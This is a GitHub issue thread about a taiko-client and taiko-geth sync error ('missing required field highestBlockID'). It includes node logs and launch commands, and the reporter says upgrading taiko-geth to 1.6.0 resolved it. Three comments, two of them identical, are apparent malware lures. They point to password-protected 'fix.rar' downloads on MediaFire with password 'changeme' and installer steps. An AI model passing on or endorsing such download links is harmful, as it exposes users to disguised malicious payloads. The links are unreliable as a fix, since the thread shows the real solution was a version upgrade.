### ISSUE TITLE
Error while syncing: invalid argument 1: missing required field 'highestBlockID' for BlockMetadata

### ISSUE THREAD

**Issue by susuper** [taikoxyz/taiko-mono#17979]
### Describe the bug

taiko-client log:
```
{"t":"2024-08-26T21:54:26.870635667Z","lvl":"info","msg":"Anchor arguments","l2Height":"327206","l1Height":"20607945","l1Hash":"0x4fd121ccc55586204c620062d30d58cff2db298e13d3e131c9154e562ffc33a0
","stateRoot":"0xbfe90cb0673eb3fc95c2f2f07420930b4020cd62cc397f7704c94bd5651ae940","baseFee":"1e-09","gasUsed":19953817}
{"t":"2024-08-26T21:54:26.870718786Z","lvl":"info","msg":"L2 baseFee","blockID":"327206","baseFee":"1e-09","syncedL1Height":"20607946","parentGasUsed":19953817}
{"t":"2024-08-26T21:54:26.877159885Z","lvl":"error","msg":"Block batch iterator callback error","error":"failed to insert new head to L2 execution engine: failed to create execution payloads: fa
iled to update fork choice: invalid argument 1: missing required field 'highestBlockID' for BlockMetadata"}
```

taiko-geth log:
```
WARN [08-26|21:54:26.876] Served engine_forkchoiceUpdatedV2        conn=127.0.0.1:59882 reqid=948 duration=1.873593ms err="invalid argument 1: missing required field 'highestBlockID' for BlockMe
tadata"
```

### Steps to reproduce

Syncing node from scratch.

taiko-client: v0.31.0
`taiko-client driver --l1.ws=ws://X.X.X.X:8546 --l1.beacon=http://X.X.X.X:5052 --l2.ws=ws://127.0.0.1:8446 --l2.auth=http://127.0.0.1:8451 --jwtSecret=/usr/local/etc/taiko/jwt.txt --taikoL1=0x06a9Ab27c7e2255df1815E6CC0168d7755Feb19a --taikoL2=0x1670000000000000000000000000000000010001 --p2p.sync --p2p.checkPointSyncUrl=https://rpc.mainnet.taiko.xyz`

taiko-geth: v1.5.0
`taiko-geth --taiko --datadir=/data/taiko/geth --networkid=167000 --state.scheme=path --syncmode full --gcmode=archive --history.transactions=0 --http --http.addr=127.0.0.1 --http.port=8445 --http.api=admin,debug,eth,net,web3,txpool,miner,taiko --ws --ws.addr=127.0.0.1 --ws.port=8446 --ws.api=admin,debug,eth,net,web3,txpool,miner,taiko --authrpc.addr=127.0.0.1 --authrpc.port=8451 --authrpc.jwtsecret=/usr/local/etc/taiko/jwt.txt --port=38403 --maxpeers=64 --bootnodes=enode://7a8955b27eda2ddf361b59983fce9c558b18ad60d996ac106629f7f913247ef13bc842c7cf6ec6f87096a3ea8048b04873c40d3d873c0276d38e222bddd72e88@43.153.44.186:30303,enode://704a50da7e727aa10c45714beb44ece04ca1280ad63bb46bb238a01bf55c19c9702b469fb12c63824fa90f5051f7091b1c5069df1ec9a0ba1e943978c09d270f@49.51.202.127:30303,enode://f52e4e212a15cc4f68df27282e616d51d7823596c83c8c8e3b3416d7ab531cefc7b8a493d01964e1918315e6b0c7a4806634aeabb9013642a9159a53f4ebc094@43.153.16.47:30303,enode://57f4b29cd8b59dc8db74be51eedc6425df2a6265fad680c843be113232bbe632933541678783c2a5759d65eac2e2241c45a34e1c36254bccfe7f72e52707e561@104.197.107.1:30303,enode://87a68eef46cc1fe862becef1185ac969dfbcc050d9304f6be21599bfdcb45a0eb9235d3742776bc4528ac3ab631eba6816e9b47f6ee7a78cc5fcaeb10cd32574@35.232.246.122:30303 --gpo.defaultprice=10000000`

### Spam policy

- [X] I verify that this issue is NOT SPAM and understand SPAM issues will be closed and reported to GitHub, resulting in ACCOUNT TERMINATION.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by davidtaikocha** [comment]
Thanks for the feedback, could u give `taiko-geth: v1.5.0` a try?

**Comment by susuper** [comment]
Thank you, the issue is solved after upgrading taiko-geth to 1.6.0.
